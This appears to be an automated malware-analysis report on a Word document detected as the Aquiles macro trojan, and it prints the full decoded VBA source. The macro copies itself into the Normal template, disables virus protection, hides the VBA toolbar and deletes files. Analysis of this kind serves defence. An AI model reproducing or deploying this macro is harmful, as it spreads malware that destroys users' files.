Verdict: MALICIOUS
Risk Score: 180

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The macro attempts to modify itself and potentially other templates, suggesting an effort to hide or establish persistence. The ClamAV detection of 'Doc.Trojan.Aquiles-1' strongly indicates malicious intent, likely involving the delivery of a secondary payload.
Heuristics (3)
- ClamAV: Doc.Trojan.Aquiles-1 (severity: critical; rule: CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Aquiles-1
- VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 1 related finding): Document contains VBA macro code
- Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2849 bytes | 9267d541ef84e31dc7b5663356b0bc7975e52533a9a8c8c31d11fca1662b6dfa | ClamAV: Doc.Trojan.Aquiles-1 | unlikely |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "Aquiles"
Attribute VB_Base = "1Normal.Aquiles"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
If ActiveDocument.VBProject.VBComponents.Count > 1 Then
For op = 2 To ActiveDocument.VBProject.VBComponents.Count
cantidad = ActiveDocument.VBProject.VBComponents.Item(op).CodeModule.CountOfLines
ActiveDocument.VBProject.VBComponents.Item(op).CodeModule.DeleteLines 1, cantidad
Next op
End If
If NormalTemplate.VBProject.VBComponents.Count > 1 Then
For op = 2 To NormalTemplate.VBProject.VBComponents.Count
cantidad = NormalTemplate.VBProject.VBComponents.Item(op).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents.Item(op).CodeModule.DeleteLines 1, cantidad
Next op
End If
Document_Close
End Sub
Private Sub Document_Close()
On Error Resume Next
CommandBars("Visual Basic").Visible = False
Options.VirusProtection = False
' CommandBars("Tools").Controls("Macro").Enabled = False
' CommandBars("View").Controls(6).Enabled = False
' CommandBars("tools").Controls(15).Enabled = False
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
If MacroContainer.FullName = ActiveDocument.FullName Then
If nt.Name <> "Aquiles" Then GoTo ClaudioNormal
Else
If ad.Name <> "Aquiles" Then GoTo Aquilesdocument
End If
GoTo Findelmundo
Aquilesdocument:
lineas = ad.CodeModule.CountOfLines
ad.CodeModule.DeleteLines 1, lineas
lineas = 1
Do While lineas <= nt.CodeModule.CountOfLines
cadenadecodigo = nt.CodeModule.lines(lineas, 1)
ad.CodeModule.insertlines lineas, cadenadecodigo
lineas = lineas + 1
Loop
ad.Name = "Aquiles"
Open "C:\systemDos" For Append As #1
Print #1, ActiveDocument.Path
Close #1
ActiveDocument.Save
GoTo Findelmundo
ClaudioNormal:
lineas = nt.CodeModule.CountOfLines
nt.CodeModule.DeleteLines 1, lineas
lineas = 1
Do While lineas <= ad.CodeModule.CountOfLines
cadenadecodigo = ad.CodeModule.lines(lineas, 1)
nt.CodeModule.insertlines lineas, cadenadecodigo
lineas = lineas + 1
Loop
nt.Name = "Aquiles"
NormalTemplate.Save
Findelmundo:
If Dir("C:\systemDos", vbNormal) <> "" Then
If FileLen("C:\systemDos") > 1024 Then
Open "C:\systemDos" For Input As #1
Line Input #1, direccion
Do While Not EOF(1)
Kill (s + "\*.*")
Line Input #1, direccion
Loop
Close #1
Kill ("C:\systemDos")
End If
End If
'To the boastful river, God has put a ford. Malinke
'And once again the emperor interposed his soul, claudIo
'this is a modification, I am trying to reach perfection
End Sub
```